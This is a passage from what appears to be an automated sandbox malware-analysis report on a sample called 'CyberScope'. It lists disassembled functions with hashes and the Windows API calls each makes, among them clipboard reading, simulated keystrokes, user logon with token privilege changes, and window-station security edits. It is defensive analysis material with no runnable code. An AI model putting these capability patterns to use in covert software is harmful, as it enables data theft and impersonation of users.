                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 229384f038254d4a7ab0e83a5079ec46e422158745f445f0335606c537f0e326
                                                                                    • Instruction ID: 3a72d8f62abc4c897095b805bf4ca002cf773f622e8e04ddd143feb1c72793c2
                                                                                    • Opcode Fuzzy Hash: 229384f038254d4a7ab0e83a5079ec46e422158745f445f0335606c537f0e326
                                                                                    • Instruction Fuzzy Hash: 0EF0B436511E20A69B351B66DC05F9B375BBF607E0F158019FC04D7191DB60F8A186E0
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C3BC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 68874fb5c7f58cf47b008662591c263912c8c1f33aa12ca742cc372d3efe8b90
                                                                                    • Instruction ID: 90b1483aac6565dc4c80fac0d1a92c00dcd9bc7c1c76a3cc04ed0545eea2f9c6
                                                                                    • Opcode Fuzzy Hash: 68874fb5c7f58cf47b008662591c263912c8c1f33aa12ca742cc372d3efe8b90
                                                                                    • Instruction Fuzzy Hash: 28E02B31200620A6EB3037739C09F9B364CAF213A0F158168FC2896590CF70DD0181E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b29138c39eeb1788a142ebd970bff42784fe2df8b3c9c6f5d219f090f276c6ff
                                                                                    • Instruction ID: 8cb336769adad192ab28191deb3fdb45788db24027566b57d2a4c9ae7dac0696
                                                                                    • Opcode Fuzzy Hash: b29138c39eeb1788a142ebd970bff42784fe2df8b3c9c6f5d219f090f276c6ff
                                                                                    • Instruction Fuzzy Hash: 8DF03975105702CFCB389FA4D8A4856BBF5BF14329324893EE2DA86610C7319844DF20
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 2638373210-0
                                                                                    • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                    • Instruction ID: 67bce496def0262e50e170601352b76378c57a34632f4a60229a97416d4151cd
                                                                                    • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                    • Instruction Fuzzy Hash: D5F0F87550020DFFDF05DF90C941E9E7BB9FB14318F208445F9159A251C336EA21EBA1
                                                                                    APIs
                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00193963
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_
                                                                                    • String ID:
                                                                                    • API String ID: 1144537725-0
                                                                                    • Opcode ID: ebe1e84ba35fe308a8666f2c013fa54d6fc234996bf51c4d6224a6441c0ddb68
                                                                                    • Instruction ID: 168822a2438c0613c9dd3e5dd11fc9a330e88c781e43653cd46b06477945f4b2
                                                                                    • Opcode Fuzzy Hash: ebe1e84ba35fe308a8666f2c013fa54d6fc234996bf51c4d6224a6441c0ddb68
                                                                                    • Instruction Fuzzy Hash: F4F037709143149FEB529F64EC4E7D57BBCA70170CF1041E5E64496281D7B4579CCF51
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00193A76
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 541455249-0
                                                                                    • Opcode ID: c3bd6c10fbc64ca8e8d3c7415deda5aca998e47b3d5b221cffffc1310c77afc2
                                                                                    • Instruction ID: d285523b563dd675e63792c7aecfc54414f97116ac3554e819ef94f22f86341a
                                                                                    • Opcode Fuzzy Hash: c3bd6c10fbc64ca8e8d3c7415deda5aca998e47b3d5b221cffffc1310c77afc2
                                                                                    • Instruction Fuzzy Hash: 3EE0CD7290012457CB20A2589C05FDA77DDDFC8790F054171FC05D7258DA70DD848590
                                                                                    APIs
                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001FE857
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderPath_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2987691875-0
                                                                                    • Opcode ID: c0c4631ae88f84fee346ca5b8a08dbcb141c7e38da185a0fc86bce30bb4beb23
                                                                                    • Instruction ID: ae98cdf2e673f8d8ece090df669efb9c2ed5a1f27e43f4451dc7ebe33107defc
                                                                                    • Opcode Fuzzy Hash: c0c4631ae88f84fee346ca5b8a08dbcb141c7e38da185a0fc86bce30bb4beb23
                                                                                    • Instruction Fuzzy Hash: 7AD05EA19002283BEF60B674AC0DDBB3AACC740210F0006A0786DD3152EA30EE4586B0
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00201306
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 848f4e28af86a64000468ace037ab7d17ad75696a55e47fc1bcf033b030125c0
                                                                                    • Instruction ID: 52dace0eea5e9d07a20e6d1f040901c247d9715d8f97ae4cc63eaf7789138b26
                                                                                    • Opcode Fuzzy Hash: 848f4e28af86a64000468ace037ab7d17ad75696a55e47fc1bcf033b030125c0
                                                                                    • Instruction Fuzzy Hash: 8AD05EB1422324BFDB2C8B51DD4ACA7769CE901651340216EB802D2980F5A0FD20CAA0
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,001D0A84,?,?,00000000,?,001D0A84,00000000,0000000C), ref: 001D0737
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: fcf5cace8b8dff502602f39af747111ed367d73a0b7ba3e15f93044abe2a0a9a
                                                                                    • Instruction ID: e27b99e798d2ea6ed31f0e0a6d2df6546d3138f313d17c3ad3ca27d9c57901bd
                                                                                    • Opcode Fuzzy Hash: fcf5cace8b8dff502602f39af747111ed367d73a0b7ba3e15f93044abe2a0a9a
                                                                                    • Instruction Fuzzy Hash: 3AD06C3200010DBBDF128F84ED06EDA3BAAFB48714F014000BE1856020C732E832AB90
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001AFC86
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001EFCB8
                                                                                    • IsIconic.USER32(00000000), ref: 001EFCC1
                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 001EFCCE
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001EFCD8
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001EFCEE
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001EFCF5
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001EFD01
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 001EFD12
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 001EFD1A
                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 001EFD22
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001EFD25
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EFD3A
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001EFD45
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EFD4F
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001EFD54
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EFD5D
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001EFD62
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EFD6C
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 001EFD71
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001EFD74
                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 001EFD9B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 0fcf34d2e67f83d37b13c4cd163bfb2fbfc892927b5c85789a454c52f7cf948d
                                                                                    • Instruction ID: 0cb97239f3930997e4dc6449849ca77ce7b11ac367fe6c5c7a480d7b0bbad08c
                                                                                    • Opcode Fuzzy Hash: 0fcf34d2e67f83d37b13c4cd163bfb2fbfc892927b5c85789a454c52f7cf948d
                                                                                    • Instruction Fuzzy Hash: D1316571A802587BEB306BF66C4DF7F7E6CEB44B50F210069FA05E61D1D6B05D12AAA0
                                                                                    APIs
                                                                                      • Part of subcall function 001F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F205A
                                                                                      • Part of subcall function 001F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F2087
                                                                                      • Part of subcall function 001F2010: GetLastError.KERNEL32 ref: 001F2097
                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001F1BD2
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001F1BF4
                                                                                    • CloseHandle.KERNEL32(?), ref: 001F1C05
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001F1C1D
                                                                                    • GetProcessWindowStation.USER32 ref: 001F1C36
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 001F1C40
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001F1C5C
                                                                                      • Part of subcall function 001F1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001F1B48), ref: 001F1A20
                                                                                      • Part of subcall function 001F1A0B: CloseHandle.KERNEL32(?,?,001F1B48), ref: 001F1A35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                    • String ID: $default$winsta0$j%
                                                                                    • API String ID: 22674027-1737028904
                                                                                    • Opcode ID: 660689a8c0e76e68ddfa967b0b41f823a3d8d9eee3a4b4b2827a7c0f49c2c03a
                                                                                    • Instruction ID: 244ce6bf6824dde23ece81b9d5f448e979808309c2401d96de3578af0bea488f
                                                                                    • Opcode Fuzzy Hash: 660689a8c0e76e68ddfa967b0b41f823a3d8d9eee3a4b4b2827a7c0f49c2c03a
                                                                                    • Instruction Fuzzy Hash: 8081137190020DBBDF219FA4EC49BFE7BB9AF08704F144129FA15A61A0D7758A56CB60
                                                                                    APIs
                                                                                      • Part of subcall function 001F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F1A60
                                                                                      • Part of subcall function 001F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A6C
                                                                                      • Part of subcall function 001F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A7B
                                                                                      • Part of subcall function 001F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A82
                                                                                      • Part of subcall function 001F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F1A99
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F1518
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001F154C
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001F1563
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 001F159D
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F15B9
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001F15D0
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001F15D8
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001F15DF
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001F1600
                                                                                    • CopySid.ADVAPI32(00000000), ref: 001F1607
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001F1636
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F1658
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F166A
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F1691
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F1698
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F16A1
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F16A8
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F16B1
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F16B8
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F16C4
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F16CB
                                                                                      • Part of subcall function 001F1ADF: GetProcessHeap.KERNEL32(00000008,001F14FD,?,00000000,?,001F14FD,?), ref: 001F1AED
                                                                                      • Part of subcall function 001F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001F14FD,?), ref: 001F1AF4
                                                                                      • Part of subcall function 001F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001F14FD,?), ref: 001F1B03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                    • String ID:
                                                                                    • API String ID: 4175595110-0
                                                                                    • Opcode ID: 9b9ec6ea606c1366c88958acb0928196df69dc8f757b37011e19727c751aecc5
                                                                                    • Instruction ID: 578cea6a2407501814aa2b77f1f47d4379fab5546b9aea77c8b5043a989c4f61
                                                                                    • Opcode Fuzzy Hash: 9b9ec6ea606c1366c88958acb0928196df69dc8f757b37011e19727c751aecc5
                                                                                    • Instruction Fuzzy Hash: AD711CB2900209FBDB10DFA5EC49FFEBBB8BF04750F184515EA15E61A0D7719A06CB60
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(0022DCD0), ref: 0020F586
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0020F594
                                                                                    • GetClipboardData.USER32(0000000D), ref: 0020F5A0
                                                                                    • CloseClipboard.USER32 ref: 0020F5AC
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0020F5E4
                                                                                    • CloseClipboard.USER32 ref: 0020F5EE
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0020F619
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0020F626
                                                                                    • GetClipboardData.USER32(00000001), ref: 0020F62E
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0020F63F
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0020F67F
                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0020F695
                                                                                    • GetClipboardData.USER32(0000000F), ref: 0020F6A1
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0020F6B2
                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0020F6D4
                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0020F6F1
                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0020F72F
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0020F750
                                                                                    • CountClipboardFormats.USER32 ref: 0020F771
                                                                                    • CloseClipboard.USER32 ref: 0020F7B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                    • String ID:
                                                                                    • API String ID: 420908878-0
                                                                                    • Opcode ID: a5c17cd19e5cbdd73d349ca773155d06a75837b2bd9a3b5e2f8a43ec7367edbd
                                                                                    • Instruction ID: 15b1a01af922e376be97a875717703d92b47d30ca7a1c47294b1467e3c610228
                                                                                    • Opcode Fuzzy Hash: a5c17cd19e5cbdd73d349ca773155d06a75837b2bd9a3b5e2f8a43ec7367edbd
                                                                                    • Instruction Fuzzy Hash: 5661F431214302AFC720EF60ED88F2ABBA8AF54704F14456DF846876E3DB31D946CB62
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00207403
                                                                                    • FindClose.KERNEL32(00000000), ref: 00207457
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00207493
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002074BA
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 002074F7
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00207524
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                    • API String ID: 3830820486-3289030164
                                                                                    • Opcode ID: 1f8f3d88f37d59dc2fce747d7e37144b32ed06254c134d5efbcf100aa9163622
                                                                                    • Instruction ID: 4af51fc084ad4140ab964216a2fc81cf56e36dc171c149084f7af2b81e4f713b
                                                                                    • Opcode Fuzzy Hash: 1f8f3d88f37d59dc2fce747d7e37144b32ed06254c134d5efbcf100aa9163622
                                                                                    • Instruction Fuzzy Hash: 2DD16F72908304AFC710EFA4C885EABB7ECAF99704F44491DF589D7192EB74EA44C762
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0020A0A8
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0020A0E6
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0020A100
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0020A118
                                                                                    • FindClose.KERNEL32(00000000), ref: 0020A123
